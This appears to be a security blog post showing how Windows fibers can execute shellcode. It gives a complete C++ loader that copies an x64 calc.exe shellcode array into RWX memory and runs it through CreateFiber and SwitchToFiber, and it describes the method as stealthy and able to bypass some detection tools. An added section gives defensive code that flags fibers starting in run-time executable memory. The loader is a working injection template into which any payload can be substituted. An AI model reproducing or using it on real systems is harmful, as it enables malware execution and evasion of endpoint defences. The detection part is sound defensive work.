What are Windows Fibers?
Fibers are lightweight units of execution that run within the context of a thread. Unlike threads (which are scheduled by the OS), fibers must be manually scheduled by the application. Think of fibers as cooperative multitasking within a single thread.
Fibers allow a program to manually switch execution between multiple execution paths (fibers) in a controlled manner, making them ideal for crafting stealthy execution chains.
//windowsfibers.cpp
#include <windows.h> // 1
unsigned char my_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; // 2
unsigned int my_payload_len = sizeof(my_payload); // 3
int main() {
    PVOID f; // converted
    PVOID payload_mem; // memory buffer for payload
    PVOID payloadF; // fiber
    // convert main thread to fiber
    f = ConvertThreadToFiber(NULL);
    // allocate memory buffer
    payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(payload_mem, my_payload, my_payload_len);
    // create a fiber that will execute payload
    payloadF = CreateFiber(NULL, (LPFIBER_START_ROUTINE)payload_mem, NULL);
    SwitchToFiber(payloadF);
    return 0;
}
Explanation
🧬 Code Breakdown
f = ConvertThreadToFiber(NULL);
- Converts the current main thread into a fiber so that it can call SwitchToFiber later. Without this, the thread can't switch to another fiber.
payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(payload_mem, my_payload, my_payload_len);
- Allocates memory using VirtualAlloc with executable permissions.
- Copies the shellcode (my_payload) into that buffer.
payloadF = CreateFiber(NULL, (LPFIBER_START_ROUTINE)payload_mem, NULL);
SwitchToFiber(payloadF);
- A new fiber is created with the entry point set to the shellcode.
- SwitchToFiber jumps execution to the shellcode; in this case, it opens calc.exe.
🧪 Behavior
The payload is classic calc.exe shellcode, commonly used for demonstration. When run, the program will spawn the Windows Calculator, a clear signal the injection worked.
⚠️ Ethical Note
This technique is for educational and research purposes only. It demonstrates how alternate thread control structures (like Fibers) can be abused to execute arbitrary code and bypass some detection tools.
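Seen from the detection side, the sequence in this post has a recognizable shape: a fiber whose start address lies in memory the process allocated at run time and that is executable when CreateFiber is called. The following is an added example, not code from the original post, that applies this check to a constructed API-call trace; the ApiEvent record layout, the function names and the sample addresses are assumptions of the example.

```cpp
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical telemetry record; this layout is an assumption of the example.
struct ApiEvent {
    std::string api;   // API name as logged
    uint64_t addr;     // VirtualAlloc: base; VirtualProtect: lpAddress; CreateFiber: lpStartAddress
    uint64_t size;     // region size (VirtualAlloc / VirtualProtect), else 0
    uint32_t protect;  // flProtect / flNewProtect, else 0
};
struct Region { uint64_t base, size; uint32_t protect; };

// PAGE_EXECUTE 0x10, _READ 0x20, _READWRITE 0x40, _WRITECOPY 0x80 (winnt.h)
static bool executable(uint32_t protect) { return (protect & 0xF0u) != 0; }
static bool contains(const Region& r, uint64_t a) { return a >= r.base && a - r.base < r.size; }

// Returns the start address of every fiber whose entry point lies in
// run-time allocated memory that is executable when CreateFiber is called.
std::vector<uint64_t> suspicious_fiber_starts(const std::vector<ApiEvent>& trace) {
    std::vector<Region> regions;
    std::vector<uint64_t> hits;
    for (const ApiEvent& e : trace) {
        if (e.api == "VirtualAlloc") {
            regions.push_back({e.addr, e.size, e.protect});
        } else if (e.api == "VirtualProtect") {
            for (Region& r : regions)  // keep the region's current protection up to date
                if (contains(r, e.addr)) r.protect = e.protect;
        } else if (e.api == "CreateFiber") {
            for (const Region& r : regions)
                if (contains(r, e.addr) && executable(r.protect)) {
                    hits.push_back(e.addr);
                    break;
                }
        }
    }
    return hits;
}

// Constructed sample trace; the addresses are made up for illustration.
std::vector<ApiEvent> sample_trace() {
    return {
        {"ConvertThreadToFiber", 0, 0, 0},
        {"VirtualAlloc", 0x1f0000, 0x1000, 0x40},  // RWX buffer, as in the post
        {"CreateFiber", 0x1f0000, 0, 0},           // entry point inside that buffer
        {"CreateFiber", 0x7ff600001000, 0, 0},     // entry point in image-backed code
        {"SwitchToFiber", 0, 0, 0},
    };
}
```

Fibers normally start in image-backed code, so a hit is a triage signal rather than a verdict; processes that generate code at run time can match as well.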